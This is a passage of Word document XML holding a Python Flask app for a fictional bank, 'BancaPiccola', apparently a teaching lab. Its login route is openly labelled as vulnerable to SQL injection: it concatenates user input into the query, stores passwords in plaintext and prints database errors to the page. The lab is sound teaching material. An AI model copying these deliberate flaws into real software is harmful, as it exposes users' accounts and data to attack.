        </w:rPr>
        <w:t xml:space="preserve"># Utenti di test</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    utenti_test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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"Sup3rS3gret0!"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"admin"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"mario"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"mario123"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,       </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"cliente"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FloatTok"/>
        </w:rPr>
        <w:t xml:space="preserve">1500.50</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">),</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"giulia"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"giulia2025"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,     </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"cliente"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FloatTok"/>
        </w:rPr>
        <w:t xml:space="preserve">8200.00</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">),</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"luca"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"passwordLuca!"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"cliente"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FloatTok"/>
        </w:rPr>
        <w:t xml:space="preserve">320.75</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">),</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    ]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    cur.executemany(</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"INSERT OR IGNORE INTO utenti (username, password, ruolo, saldo) "</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"VALUES (?, ?, ?, ?)"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        utenti_test</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    )</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Prodotti di test (per il motore di ricerca)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    prodotti_test </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> [</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"Conto Base"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"Conto corrente senza canone, online"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"Conto Premium"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,     </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"Conto con servizi avanzati"</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"Carta Prepagata"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"Carta ricaricabile per minorenni"</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"Mutuo Casa"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"Mutuo a tasso fisso 4,2%"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,          </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FloatTok"/>
        </w:rPr>
        <w:t xml:space="preserve">200.0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">),</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"Polizza Vita"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"Assicurazione vita base"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FloatTok"/>
        </w:rPr>
        <w:t xml:space="preserve">45.0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">),</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    ]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    cur.executemany(</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"INSERT OR IGNORE INTO prodotti (nome, descrizione, prezzo) "</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"VALUES (?, ?, ?)"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        prodotti_test</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    )</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    conn.commit()</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    conn.close()</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># ════════════════════════════════════════════════════════════════════</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Pagina principale</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># ════════════════════════════════════════════════════════════════════</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">@app.route</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utente </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> session.get(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"username"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>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&lt;!DOCTYPE html&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        &lt;html&gt;&lt;head&gt;&lt;title&gt;BancaPiccola&lt;/title&gt;&lt;/head&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        &lt;body&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            &lt;h1&gt;BancaPiccola&lt;/h1&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">% i</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">f utente %}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">                &lt;p&gt;Benvenuto &lt;b&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">{{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> utente </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;/b&gt;! </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">                   &lt;a href="/dashboard"&gt;Vai alla dashboard&lt;/a&gt; | </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">                   &lt;a href="/logout"&gt;Esci&lt;/a&gt;&lt;/p&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">% e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">lse %}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">                &lt;p&gt;&lt;a href="/login"&gt;Accedi&lt;/a&gt;&lt;/p&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">% e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">ndif %}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            &lt;hr&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            &lt;h2&gt;Cerca un prodotto&lt;/h2&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            &lt;form method="GET" action="/cerca"&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">                &lt;input name="q" placeholder="es. conto, mutuo, polizza..." size="40"&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">                &lt;button&gt;Cerca&lt;/button&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            &lt;/form&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        &lt;/body&gt;&lt;/html&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    """</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, utente</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">utente)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># ════════════════════════════════════════════════════════════════════</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># LOGIN — VULNERABILE A SQL INJECTION</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># ════════════════════════════════════════════════════════════════════</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w: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 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserv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 VULNERABILE: input concatenato direttamente nella query</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        query </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">f"SELECT id, username, ruolo FROM utenti "</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">                 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">f"WHERE username='</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">username</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">' AND password='</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">password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f"[DEBUG] Query eseguita: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  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># solo per il lab</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ControlFlowTok"/>
        </w:rPr>
        <w:t xml:space="preserve">try</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            cur.execute(query)</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f"&lt;h2&gt;Errore nel database:&lt;/h2&gt;&lt;pre&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;/pre&gt;"</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br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ControlFlowTok"/>
        </w:rPr>
        <w:t xml:space="preserve">if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> riga:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            session[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"utente_id"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> riga[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            session[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"username"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">]  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> riga[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            session[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"ruolo"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">]     </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> riga[</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"&lt;h3&gt;Credenziali errate&lt;/h3&gt;&lt;a href='/login'&gt;Riprova&lt;/a&gt;"</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StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        &lt;h2&gt;Login&lt;/h2&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        &lt;form method="POST"&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            Utente: &lt;input name="username" autofocus&gt;&lt;br&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            Password: &lt;input name="password" type="password"&gt;&lt;br&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            &lt;button&gt;Accedi&lt;/button&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        &lt;/form&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
